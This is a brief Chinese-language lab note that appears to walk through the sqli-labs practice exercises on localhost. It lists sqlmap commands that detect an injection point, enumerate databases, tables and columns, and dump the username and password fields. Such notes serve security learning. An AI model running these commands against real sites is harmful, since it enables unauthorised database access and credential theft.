1.检测注入点
sqlmap.py -u http://localhost/sqli/Less-2/?id=1
2.存在时间盲注和布尔盲注,然后查看数据库
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 –dbs
3.查看表
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 -D security –tables
4.查看列
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 -D security -T users
–columns
5.爆破字段中的值
sqlmap.py -u http://localhost/sqli/Less-8/?id=1 -D security -T users
-C username,password –dump